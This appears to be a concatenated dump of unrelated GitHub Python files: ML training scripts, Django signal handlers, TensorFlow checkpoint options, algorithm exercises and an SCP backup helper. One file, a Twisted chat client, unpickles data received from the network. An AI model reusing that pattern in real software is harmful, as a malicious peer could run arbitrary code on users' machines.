open(os.path.join(args.config, 'word.config'), 'w', encoding='utf-8') as wordfile:\n wordconfig.write(wordfile)\n \n #update the blocks\n if(layer in blockconfig[args.model]):\n current_block = int(blockconfig[args.model][layer])\n if 'conv' in layer or 'features' in layer:\n if args.init and args.conv_block_init:\n blockconfig[args.model][layer] = str(args.conv_block_init)\n else:\n blockconfig[args.model][layer] = str(int(current_block * args.conv_block))\n if 'fc' in layer or 'classifier' in layer or 'linear' in layer:\n if args.init and args.fc_block_init:\n blockconfig[args.model][layer] = str(args.fc_block_init)\n else:\n blockconfig[args.model][layer] = str(int(current_block * args.fc_block))\n else: # initialization\n blockconfig.set(args.model, layer, str(0))\n with open(os.path.join(args.config, 'block.config'), 'w', encoding='utf-8') as blockfile:\n blockconfig.write(blockfile)\n \n wordfile.close()\n blockfile.close()\n","repo_name":"DiamondSheep/GroupDPL","sub_path":"update_config.py","file_name":"update_config.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9567147524","text":"from django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom django.utils.text import slugify, Truncator\r\n\r\nfrom opencivicdata.core.models import (\r\n Organization as OCDOrganization,\r\n Person as OCDPerson,\r\n Post as OCDPost,\r\n)\r\nfrom opencivicdata.legislative.models import (\r\n Event as OCDEvent,\r\n Bill as OCDBill,\r\n EventRelatedEntity as OCDEventRelatedEntity,\r\n)\r\n\r\nfrom councilmatic_core.models import (\r\n Organization as CouncilmaticOrganization,\r\n Person as CouncilmaticPerson,\r\n Event as CouncilmaticEvent,\r\n Bill as CouncilmaticBill,\r\n Post as CouncilmaticPost,\r\n)\r\n\r\n\r\n@receiver(post_save, sender=OCDOrganization)\r\ndef create_councilmatic_org(sender, instance, created, **kwargs):\r\n if 
created:\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(instance.name), ocd_part)\r\n\r\n co = CouncilmaticOrganization(organization=instance, slug=slug)\r\n # just update the child table, not the parent table\r\n co.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDPerson)\r\ndef create_councilmatic_person(sender, instance, created, **kwargs):\r\n if created:\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(instance.name), ocd_part)\r\n\r\n cp = CouncilmaticPerson(person=instance, slug=slug)\r\n # just update the child table, not the parent table\r\n cp.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDEvent)\r\ndef create_councilmatic_event(sender, instance, created, **kwargs):\r\n if created:\r\n truncator = Truncator(instance.name)\r\n ocd_part = instance.id.rsplit(\"-\", 1)[-1]\r\n slug = \"{0}-{1}\".format(slugify(truncator.words(5)), ocd_part)\r\n\r\n ce = CouncilmaticEvent(event=instance, slug=slug)\r\n\r\n # just update the child table, not the parent table\r\n ce.save_base(raw=True)\r\n\r\n for entity in OCDEventRelatedEntity.objects.filter(\r\n agenda_item__event=instance, bill__isnull=False\r\n ):\r\n cb = entity.bill.councilmatic_bill\r\n cb.last_action_date = cb.get_last_action_date()\r\n cb.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDBill)\r\ndef create_councilmatic_bill(sender, instance, created, **kwargs):\r\n if created:\r\n slug = slugify(instance.identifier)\r\n\r\n cb = CouncilmaticBill(bill=instance, slug=slug)\r\n\r\n else:\r\n cb = instance.councilmatic_bill\r\n\r\n cb.last_action_date = cb.get_last_action_date()\r\n\r\n # just update the child table, not the parent table\r\n cb.save_base(raw=True)\r\n\r\n\r\n@receiver(post_save, sender=OCDPost)\r\ndef create_councilmatic_post(sender, instance, created, **kwargs):\r\n if created:\r\n cp = CouncilmaticPost(post=instance)\r\n 
cp.save_base(raw=True)\r\n","repo_name":"datamade/django-councilmatic","sub_path":"councilmatic_core/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"74872053571","text":"import argparse\nimport torch\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\n\nimport classify_svhn as svhn\n\nimport matplotlib.pyplot as plt\n\n\n##This code was inspired from:\n#https://github.com/pytorch/examples/blob/master/vae/main.py\n\n\nclass VAE(nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE, self).__init__()\n\t\t##Encoder\n\t\tconv_e = nn.Sequential(\n\t\t\t\tnn.Conv2d(3, 32, kernel_size=3, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.AvgPool2d(kernel_size=2, stride=2),\n\t\t\t\tnn.Conv2d(32, 64, kernel_size=3, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.AvgPool2d(kernel_size=2, stride=2),\n\t\t\t\tnn.Conv2d(64, 256, kernel_size=5, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.Conv2d(256, 256, kernel_size=1, bias=True, stride=1),\n\t\t\t\tnn.ReLU(),\n\n\t\t\t\tnn.Conv2d(256, 256, kernel_size=1, bias=True, stride=1),\n\t\t\t\tnn.ReLU()\n\t\t\t\t\n\t\t\t)\n\n\t\tlinear_e = nn.Linear(1024, 100*2)\n\n\t\tself.encoder = nn.ModuleList([conv_e, linear_e])\n\n\t\t##Decoder\n\t\t#conv_d = nn.Sequential(\n\t\t#Takes z latent variable of size 100\n\t\t\t\t#nn.Conv2d(256, 64, kernel_size=3, bias=True, stride=1, padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(64, 32, kernel_size=3, bias=True, stride=1, padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(32, 16, kernel_size=3, bias=True, stride=1, 
padding=2),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.UpsamplingBilinear2d(size=None, scale_factor=2),\n\t\t\t\t#nn.Conv2d(16, 8, kernel_size=3, bias=True, stride=1, padding=0),\n\t\t\t\t#nn.ReLU(),\n\t\t\t\t#nn.Conv2d(8, 3, kernel_size=3, bias=True, stride=1, padding=0),\n\n\n\t\t\t#)\n\n\t\t#linear_d = nn.Linear(100, 256)\n\t\t#relu = nn.ReLU()\n\n\t\t#self.decoder = nn.ModuleList([linear_d, relu, conv_d])\n\n\t\tself.decoder = nn.Sequential(\n\t\t nn.Linear(100, 128),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(128, 256),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(256, 512),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(512, 1024),\n\t\t nn.LeakyReLU(0.2, inplace=True),\n\t\t nn.Linear(1024, 3072)\n\t )\n\n\n\t#Outputs mean/log-variance\n\tdef encode(self, x):\n\n\t\tz = self.encoder[0](x)\n\t\t#Reshape for FC\n\t\tz = z.view(z.size(0), -1)\n\n\t\t#print(z.shape)\n\n\t\t#Outputs 2 vectors of size 100, mean vector and std vector\n\t\t#print(z.shape)\n\t\tz = self.encoder[1](z)\n\n\t\t#first 100 for mean vector, the other 100 for logvar\n\t\treturn z[:, :100], z[:, 100:]\n\n\t#Outputs reconstructed x\n\tdef decode(self, z):\n\t\t#z = self.linear_d(z)\n\t\t#z = self.decoder[0](z)\n\t\t#z = self.decoder[1](z)\n\t\t\n\t\t#Get dim of z to know if we are processing batches or 1 example\n\t\t#dim_z = len(z.shape)\n\n\t\t#if(dim_z == 1):\n\t\t\t#Reshape z from 1 dim to 4 dim\t\n\t\t#\tz = z.view(1, z.shape[0], 1, 1)\n\t\t#else:\n\t\t\t#Reshape z from 2 dim to 4 dim\n\t\t#\tz = z.view(z.shape[0], z.shape[1], 1, 1)\n\t\t#print(z.shape)\n\n\t\t#recon_x = self.decoder[2](z)\n\n\t\t#print(z.shape)\n\n\t\trecon_x = self.decoder(z)\n\n\t\t#Different results with sigmoid because of normalization scheme\n\t\trecon_x = torch.tanh(recon_x)\n\t\t\n\t\treturn recon_x\n\n\t#Sampling by re-perameterization trick\n\tdef reparameterize(self, mu, logvar):\n\t\t#Need std for normal distribution\n\t\tstd = torch.exp(0.5*logvar)\n\t\teps = torch.randn_like(std)\n\t\tz 
= mu + eps*std\n\t\treturn z\n\n\n\tdef forward(self, x):\n\t\tmu, logvar = self.encode(x)\n\t\tz = self.reparameterize(mu, logvar)\n\t\t#z = (batch,latent_space)\n\t\trecon_x = self.decode(z)\n\t\treturn recon_x, mu, logvar\n\n\n\n# Reconstruction + KL divergence losses summed over all elements of batch\ndef loss_elbo(recon_x, x, mu, logvar):\n\n\t#Use MSE loss because we are dealing with RGB images\n\tloss = nn.MSELoss(reduction='sum')\n\tmarginal_likelihood = loss(recon_x.view(recon_x.shape[0], 3, x.shape[2]**2), x.view(x.shape[0], x.shape[1], x.shape[2]**2))\n\t\n\t#marginal_likelihood = loss(recon_x.view(recon_x.shape[0], recon_x.shape[1], recon_x.shape[2]**2), x.view(x.shape[0], x.shape[1], x.shape[2]**2))\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n\t#print(\"KL divergence: \"+str(KLD.item()))\n\n\tloss = marginal_likelihood + KLD\n\n\treturn loss\n\n\ndef train(epoch, train_loader):\n\t#Mode train\n\tmodel.train()\n\n\ttrain_loss = 0\n\n\tfor i, inputs in enumerate(train_loader):\n\n\t\tx = inputs[0]\n\t\ty = inputs[1]\n\t\t\n\t\tx = x.to(device)\n\t\toptimizer.zero_grad()\n\n\t\trecon_batch, mu, logvar = model(x)\n\t\tloss = loss_elbo(recon_batch, x, mu, logvar)\n\t\tloss.backward()\n\t\ttrain_loss += loss.item()\n\t\toptimizer.step()\n\n\t\tif i % 100 == 0:\n\t\t\tprint('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n\t\t\t\tepoch, i * len(x), len(train_loader.dataset),\n\t\t\t\t100. 
* i / len(train_loader),\n\t\t\t\tloss.item() / len(x)))\n\n\tprint('====> Epoch: {} Average loss: {:.4f}'.format(\n\t\t epoch, train_loss / len(train_loader.dataset)))\n\n\ndef eval(epoch, valid_loader):\n\t#Mode eval\n\tmodel.eval()\n\n\tepoch_loss = 0\n\n\twith torch.no_grad():\n\n\t\tfor i, inputs in enumerate(test_loader):\n\n\t\t\tx = inputs[0]\n\t\t\ty = inputs[1]\n\n\t\t\tx = x.to(device)\n\t\t\trecon_batch, mu, logvar = model(x)\n\t\t\tepoch_loss += loss_elbo(recon_batch, x, mu, logvar).item()\n\t\t\t\t\n\tepoch_loss /= len(test_loader.dataset)\n\tprint('====> Test Average loss: {:.4f}'.format(epoch_loss))\n\n\n#Disentangled representation Q3.2\n#epsilon is the small perturbation\n#Accepts one sample z (latent_space)\n#Saves 100 (latent_space dimension) images\ndef disentangled(z, model, epsilon=5):\n\n\tlatent_space = z.shape[0]\n\t#Loop over the dimensions of latent space\n\tnew_z = z.clone()\n\n\tfor i in range(latent_space):\n\t\t\n\t\tnew_z[i] = z[i] + epsilon \n\t\tsample = model.decode(new_z)\n\n\t\tsave_image(sample.view(1, 3, 32, 32),\n\t\t\t\t\t 'Disentangled representation/sample_' + str(i) + '.png', normalize=True)\n\n\t\tnew_z = z.clone()\n\n#Q3.3\n#Accepts one sample z (latent_space)\n#Saves 2+n images (from the two z samples and their (number of alpha) interpolations)\ndef interpolating(z0, z1, method, model):\n\talpha = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]\n\n\tsample = torch.zeros([len(alpha),3, 32, 32])\n\n\t#(a)Interpolate latent space\n\tif(method=='latent'):\n\t\ti = 0\n\t\tfor a in alpha:\n\t\t\tnew_z = a * z0 + (1 - a)*z1\n\n\t\t\taux = model.decode(new_z)\n\t\t\tsample[i, :, :, :] = aux.view(1, 3, 32, 32)\n\t\t\ti += 1\n\n\t\tsave_image(sample.view(len(alpha), 3, 32, 32),\n\t\t\t\t\t 'Interpolation/latent space/sample.png', normalize=True)\n\n\t#(b)Interpolate image space \n\t\n\telif(method=='image'):\n\n\t\tsample0 = model.decode(z0)\n\n\t\tsave_image(sample0.view(1, 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image 
space/sample0.png', normalize=True)\n\n\t\tsample1 = model.decode(z1)\n\n\t\tsave_image(sample1.view(1, 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image space/sample1.png', normalize=True)\n\n\n\t\ti = 0\n\t\tfor a in alpha:\n\n\t\t\taux = a * sample0 + (1 - a) * sample1\n\t\t\tsample[i, :, :, :] = aux.view(1, 3, 32, 32)\n\t\t\ti += 1\n\n\t\tsave_image(sample.view(len(alpha), 3, 32, 32),\n\t\t\t\t\t 'Interpolation/image space/sample.png', normalize=True)\n\n\n\nif __name__ == \"__main__\":\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\tmodel = VAE().to(device)\n\toptimizer = optim.Adam(model.parameters(), lr=3e-4)\n\n\t###Training###\n\n\t#n_epochs = 50\n\n\t#Load data\n\ttrain_loader, valid_loader, test_loader = svhn.get_data_loader(\"svhn\", 32)\n\n\t#Train + val\n\t#for epoch in range(n_epochs):\n\t#\ttrain(epoch, train_loader)\n\t#\teval(epoch, valid_loader)\n\n\t#\twith torch.no_grad():\n\t\t\t#Generate a batch of images using current parameters \n\t\t\t#Sample z from prior p(z) = N(0,1)\n\t#\t\tsample = torch.randn(16, 100).to(device)\n\t#\t\tsample = model.decode(sample)\n\t#\t\tsave_image(sample.view(16, 3, 32, 32),\n\t#\t\t\t\t 'results/sample_' + str(epoch) + '.png', normalize=True)\n\n\n\t#Saving the model weights\n\t#torch.save(model.state_dict(), 'weights/weights.h5')\n\n\n\t###Qualitative Evaluation###\n\n\tpath_weights = 'weights/weights.h5'\n\n\tdevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\tmodel.load_state_dict(torch.load(path_weights))\n\tprint(\"Model successfully loaded\")\n\n\t#put the model in eval mode\n\tmodel = model.eval()\n\n\t#Sample z from prior p(z) = N(0,1)\n\t#sample = torch.randn(48, 100).to(device)\n\t#sample = model.decode(sample)\n\t#save_image(sample.view(48, 3, 32, 32),\n\t#\t\t\t 'samples_vae.png', normalize=True)\n\n\t#Q3.2\n\t#Sample z from prior p(z)=N(0,1)\n\t#z = torch.randn(100).to(device)\n\t#disentangled(z, model)\n\n\t#Q3.3\n\t#Sample two z from prior 
p(z)=N(0,1)\n\tz1 = torch.randn(100).to(device)\n\tz2 = torch.randn(100).to(device)\n\tinterpolating(z1, z2, 'image', model)\n","repo_name":"faresbs/Representation-Learning","sub_path":"assignment3/Problem3/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33363506140","text":"from twisted.internet import reactor, protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory as ClFactory\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nimport pickle\n\n\nclass Client(protocol.Protocol):\n def __init__(self):\n reactor.callInThread(self.send_message)\n\n def send_message(self):\n while True:\n self.transport.write(pickle.dumps(input()))\n\n\n def dataReceived(self, data):\n data = pickle.loads(data)\n print(type(data))\n if isinstance(data, list):\n print(\"Connected members:\")\n print(*data, sep=\", \")\n else:\n print(data)\n \n\n\nclass ClientFactory(ClFactory):\n def clientConnectionLost(self, connector, unused_reason):\n self.retry(connector)\n\n def clientConnectionFailed(self, connector, reason):\n print(reason)\n self.retry(connector)\n\n def buildProtocol(self, addr):\n return Client()\n\n\nif __name__ == '__main__':\n endpoint = TCP4ClientEndpoint(reactor, 'localhost', 12345)\n endpoint.connect(ClientFactory())\n reactor.run()","repo_name":"afromanjohan/pickle-networking","sub_path":"clientpickle.py","file_name":"clientpickle.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43397894010","text":"from dados.dados import lista_candidatos,lista_voto\nfrom time import sleep\n\nclass Eleitor:\n\n nome = input(\"Qual o nome do Eleitor: \").strip()\n n_titulo = input(\"Digite o número do título: \").strip()\n voto_presidente = int(input(\"Digite seu voto: \").strip())\n\n def 
__init__(self,nome_eleitor,titulo=False):\n self.nome_eleitor = nome_eleitor\n self.titulo = titulo\n\n def eleitor_atual(self):\n if self.nome_eleitor.isnumeric():\n self.nome = input(\"Nome incorreto!! Digite apenas letra: \")\n\n self.logado = True\n\n def verificar_titulo(self):\n while True:\n if len(self.n_titulo) == 12:\n self.titulo = True\n break\n else:\n self.n_titulo = input(\"Digite por favor o número do titulo corretamente: \")\n continue\n\n def voto(self):\n\n for i,v in lista_candidatos.items():\n if self.voto_presidente == v:\n confirmar = input(f\"Confirmar voto em {i} [S/N]: \").upper()\n if confirmar == \"S\":\n print(\"...\")\n sleep(1)\n print(\"\\033[32mVoto Registrado!!\")\n\n if self.voto_presidente not in lista_candidatos.values():\n print(\"Candidato inválido!!\")\n self.voto_presidente = int(input(\"Seu voto: \"))\n lista_voto.append(self.voto_presidente)\n","repo_name":"Geronimonetto/Projeto_Voto","sub_path":"function/Eleitor.py","file_name":"Eleitor.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2568627552","text":"from paramiko import SSHClient\nfrom scp import SCPClient\n\nfrom settings import REMOTE_HOST\n\n\ndef remote_copy(\n logger, ssh_client: SSHClient, local_path: str, remote_path: str, db_filename: str\n) -> None:\n \"\"\"\n Initiate distant file transfer.\n SCPClient takes a paramiko transport as its only argument\n \"\"\"\n transport = ssh_client.get_transport()\n if transport:\n scp = SCPClient(transport)\n try:\n scp.put(\n f\"{local_path}/{db_filename}\",\n f\"{remote_path}/{db_filename}\",\n )\n logger.success(\n f\"Backup file '{db_filename}' has been copied on '{REMOTE_HOST}'\"\n )\n except Exception as e:\n logger.error(\n f\"Error while copying '{db_filename}' on '{REMOTE_HOST}': {str(e)}\"\n )\n 
scp.close()\n","repo_name":"bolinocroustibat/databases-backup-over-scp","sub_path":"helpers/remote_copy.py","file_name":"remote_copy.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"15865838330","text":"import numpy as np\n\ndef sigmoid(x):\n\treturn 1 / (1 + np.exp(-x))\n\ndef sigmoid_derivative(x):\n\treturn x * (1 - x)\n\ntraining_inputs = np.array([[0, 0, 1],\n\t\t\t\t\t\t [1, 1, 1],\n\t\t\t\t\t\t [1, 0, 1],\n\t\t\t\t\t\t [0, 1, 1],\n\t\t\t\t\t\t [0, 1, 0]])\n\ntraining_outputs = np.array([[0, 1, 1, 0, 0]]).T\n\n#same random numbers\nnp.random.seed(2)\n\nsynaptic_weights = 2 * np.random.random((3, 1)) - 1\n\nprint('Random starting synaptic weights')\nprint(synaptic_weights)\n\nfor i in range(1):\n\tinputs = training_inputs\n\toutputs = sigmoid(np.dot(inputs, synaptic_weights))\n\tdifference = training_outputs - outputs \n\tadjustments = difference * sigmoid_derivative(outputs)\n\tprint(inputs.T)\n\tprint(adjustments)\n\tsynaptic_weights += np.dot(inputs.T, adjustments)\n\tprint(synaptic_weights)\n\nprint('Final synaptic weights')\nprint(synaptic_weights)\n\nprint('Write input values')\na = int(input('A = '))\nb = int(input('B = '))\nc = int(input('C = '))\nnew_input = np.array([[a, b, c]])\noutput = sigmoid(np.dot(new_input, synaptic_weights))\n\nprint('Result for [' + str(a) + ', ' + str(b) + ', ' + str(c) + ']')\nprint(output)\n\ninput()","repo_name":"VadimKudryavcev/Tiny-Neural-Network","sub_path":"tiny_neural_network.py","file_name":"tiny_neural_network.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4000186364","text":"import copy\nimport inspect\n\nfrom tensorflow.python.util.deprecation import deprecated_args\nfrom tensorflow.python.util.tf_export import tf_export\n\n\n@tf_export(\"train.CheckpointOptions\")\nclass CheckpointOptions(object):\n 
\"\"\"Options for constructing a Checkpoint.\n\n Used as the `options` argument to either `tf.train.Checkpoint.save()` or\n `tf.train.Checkpoint.restore()` methods to adjust how variables are\n saved/restored.\n\n Example: Run IO ops on \"localhost\" while saving a checkpoint:\n\n ```\n step = tf.Variable(0, name=\"step\")\n checkpoint = tf.train.Checkpoint(step=step)\n options = tf.train.CheckpointOptions(experimental_io_device=\"/job:localhost\")\n checkpoint.save(\"/tmp/ckpt\", options=options)\n ```\n \"\"\"\n\n # Define object attributes in __slots__ for improved memory and performance.\n __slots__ = (\n \"experimental_io_device\",\n \"experimental_enable_async_checkpoint\",\n \"experimental_write_callbacks\",\n \"enable_async\",\n )\n\n @deprecated_args(\n None, \"Use enable_async instead\", \"experimental_enable_async_checkpoint\"\n )\n def __init__(\n self,\n experimental_io_device=None,\n experimental_enable_async_checkpoint=False,\n experimental_write_callbacks=None,\n enable_async=False,\n ):\n \"\"\"Creates an object that stores options for a Checkpoint.\n\n Args:\n experimental_io_device: string. Applies in a distributed setting.\n Tensorflow device to use to access the filesystem. If `None` (default)\n then for each variable the filesystem is accessed from the CPU:0 device\n of the host where that variable is assigned. If specified, the\n filesystem is instead accessed from that device for all variables.\n\n This is for example useful if you want to save to a local directory,\n such as \"/tmp\" when running in a distributed setting. In that case pass\n a device for the host where the \"/tmp\" directory is accessible.\n\n experimental_enable_async_checkpoint: bool Type. Deprecated, please use\n the enable_async option.\n\n experimental_write_callbacks: List[Callable]. A list of callback functions\n that will be executed after each saving event finishes (i.e. after\n `save()` or `write()`). 
For async checkpoint, the callbacks will be\n executed only after the async thread finishes saving.\n\n The return values of the callback(s) will be ignored. The callback(s)\n can optionally take the `save_path` (the result of `save()` or\n `write()`) as an argument. The callbacks will be executed in the same\n order of this list after the checkpoint has been written.\n\n enable_async: bool Type. Indicates whether async checkpointing is enabled.\n Default is False, i.e., no async checkpoint.\n\n Async checkpoint moves the checkpoint file writing off the main thread,\n so that the model can continue to train while the checkpoing file\n writing runs in the background. Async checkpoint reduces TPU device idle\n cycles and speeds up model training process, while memory consumption\n may increase.\n \"\"\"\n self.experimental_io_device = experimental_io_device\n self.enable_async = experimental_enable_async_checkpoint or enable_async\n self.experimental_enable_async_checkpoint = self.enable_async\n # Ensure that each callback only has either 0 or 1 parameter\n if experimental_write_callbacks is not None:\n for callback in experimental_write_callbacks:\n assert len(inspect.signature(callback).parameters) <= 1\n self.experimental_write_callbacks = experimental_write_callbacks\n\n def __copy__(self):\n # Only `experimental_write_callbacks` needs special treatment to Ensure that\n # the list is deep-copied, but the callbacks are not deep-copied.\n result = copy.copy(super()) # First invoke the non-overridden copy method.\n result.experimental_write_callbacks = copy.copy(\n self.experimental_write_callbacks\n )\n return result\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/checkpoint/checkpoint_options.py","file_name":"checkpoint_options.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"22763436802","text":"import sys\n\nn, m = map(int, 
sys.stdin.readline().rstrip().split())\nINF = int(1e9)\ngraph = [[INF] * (n+1) for _ in range(n+1)]\n\nfor i in range(1, n+1):\n graph[i][i] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().rstrip().split())\n graph[a][b] = 1\n # graph[b][a] = 1\n\ndef floyd(n, graph):\n for k in range(1, n+1):\n for i in range(1, n+1):\n for j in range(1, n+1):\n if graph[i][j] > graph[i][k] + graph[k][j]:\n graph[i][j] = graph[i][k] + graph[k][j]\n return graph\n\n# end 번호로 도착 가능한 번호\ndef inbound(graph, end):\n idx = []\n for index in range(1, len(result)):\n if 0 < graph[index][end] < INF:\n idx.append(index)\n return idx\n\n# start 번호 에서 갈수 있는 번호\ndef outbound(graph, start):\n idx = []\n for index, row in enumerate(graph[start]):\n if 0 < row < INF:\n idx.append(index)\n return idx\n\nresult = floyd(n, graph)\n# for row in result:\n# print(row)\ncnt = 0\ntotal_sum = sum([i for i in range(1, n+1)])\n\nfor i in range(1, n+1):\n inbound_lst = inbound(result, i)\n outbound_lst = outbound(result, i)\n if sum(inbound_lst + outbound_lst) == total_sum - i:\n cnt += 1\nprint(cnt)\n\n\n# 6 6\n# 1 5\n# 3 4\n# 4 2\n# 4 6\n# 5 2\n# 5 4\n# 4번에서 갈수 있는 번호 : 2, 6\n# 4번으로 갈수 있는 번호 : 1, 3, 5","repo_name":"philhoonoh/boostcamp_coding_test_study","sub_path":"6_shortest_path/2_others/0_정확한 순위.py","file_name":"0_정확한 순위.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33529128751","text":"import random\n\nunordered = random.sample(range(10), 10)\nrandom.shuffle(unordered)\n\nprint(unordered)\nordered = []\n\nwhile len(unordered) > 0:\n lowest = unordered[0]\n for i in unordered:\n if(i < lowest):\n lowest = i\n ordered.append(lowest)\n 
unordered.remove(lowest)\n\nprint(ordered)\n","repo_name":"sarah-mcculley/python-programming","sub_path":"ManualSort/ManualSort-smcculley.py","file_name":"ManualSort-smcculley.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4000035724","text":"import inspect\nimport threading\nimport types\n\nimport gast\n\nfrom tensorflow.python.autograph.pyct import cache\nfrom tensorflow.python.autograph.pyct import inspect_utils\nfrom tensorflow.python.autograph.pyct import loader\nfrom tensorflow.python.autograph.pyct import naming\nfrom tensorflow.python.autograph.pyct import origin_info\nfrom tensorflow.python.autograph.pyct import parser\nfrom tensorflow.python.autograph.pyct import templates\nfrom tensorflow.python.autograph.pyct import transformer\nfrom tensorflow.python.autograph.utils import ag_logging as logging\n\n\ndef _wrap_into_factory(nodes, entity_name, inner_factory_name,\n outer_factory_name, closure_vars, factory_args,\n future_features):\n \"\"\"Wraps an AST into the body of a factory with consistent lexical context.\n\n The AST is expected to define some symbol with a name given by `entity_name`.\n\n This mechanism ensures that the resulting transformed entity has lexical\n scoping identical to that of the source entity, while allowing extra\n parametrization.\n\n Two nested factories achieve the following:\n\n 1. The inner factory dynamically creates the entity represented by `nodes`.\n 2. The inner factory is parametrized by a custom set of arguments.\n 3. The inner factory has a closure identical to that of the transformed\n entity.\n 4. The inner factory has local variables named like `args`, which `nodes` may\n use as additional parameters.\n 5. The inner factory returns the variables given by `entity_name`.\n 6. The outer factory is niladic.\n 7. The outer factory has no closure.\n 8. 
The outer factory creates the necessary lexical scope for the inner\n factory, so that the loaded code has the given configuration for\n closure/globals.\n 9. The outer factory returns the inner factory.\n\n Roughly speaking, the following code is generated:\n\n from __future__ import future_feature_1\n from __future__ import future_feature_2\n ...\n\n def outer_factory():\n closure_var_1 = None\n closure_var_2 = None\n ...\n\n def inner_factory(arg_1, arg_2, ...):\n <>\n return entity\n\n return inner_factory\n\n The lexical scoping is created using dummy symbol declarations which create\n local variables in the body of the outer factory, so that the Python parser\n correctly marks them as free non-global variables upon load (that is, it\n creates cell slots for each symbol. These symbols are initialized with None,\n but their values are not expected to be used; instead, the caller is expected\n to replace them with the cells of the source entity. For more details, see:\n https://docs.python.org/3/reference/executionmodel.html#binding-of-names\n\n Args:\n nodes: Tuple[ast.AST], the source code to wrap.\n entity_name: Union[Text, ast.AST], the name of the principal entity that\n `nodes` define.\n inner_factory_name: Text, the name of the inner factory.\n outer_factory_name: Text, the name of the outer factory.\n closure_vars: Iterable[Text], names of the closure variables for the inner\n factory.\n factory_args: Iterable[Text], names of additional arguments for the\n inner factory. Useful to configure variables that the converted code can\n use. 
Typically, these are modules.\n future_features: Iterable[Text], names of future statements to associate the\n code with.\n\n Returns:\n ast.AST\n \"\"\"\n dummy_closure_defs = []\n for var_name in closure_vars:\n template = \"\"\"\n var_name = None\n \"\"\"\n dummy_closure_defs.extend(templates.replace(template, var_name=var_name))\n\n if future_features:\n future_imports = gast.ImportFrom(\n module='__future__',\n names=[gast.alias(name=name, asname=None) for name in future_features],\n level=0)\n else:\n future_imports = []\n\n factory_args = [\n gast.Name(name, ctx=gast.Param(), annotation=None, type_comment=None)\n for name in factory_args\n ]\n\n template = \"\"\"\n future_imports\n def outer_factory_name():\n dummy_closure_defs\n def inner_factory_name(factory_args):\n entity_defs\n return entity_name\n return inner_factory_name\n \"\"\"\n return templates.replace(\n template,\n dummy_closure_defs=dummy_closure_defs,\n entity_defs=nodes,\n entity_name=entity_name,\n factory_args=factory_args,\n future_imports=future_imports,\n inner_factory_name=inner_factory_name,\n outer_factory_name=outer_factory_name)\n\n\nclass _PythonFnFactory(object):\n \"\"\"Helper object that wraps a Python function factory.\"\"\"\n\n def __init__(self, name, freevars, extra_locals):\n \"\"\"Creates a new factory for a Python function.\n\n Args:\n name: The function name.\n freevars: The list of non-global free variables for the function.\n extra_locals: Dict[Text, Any], names and values for custom variables that\n are accessible to the generated code as local variables.\n \"\"\"\n self._name = name\n self._freevars = freevars\n self._extra_locals = extra_locals\n\n self._unbound_factory = None\n self.module = None\n self.source_map = None\n\n def create(self,\n nodes,\n namer,\n inner_factory_name='inner_factory',\n 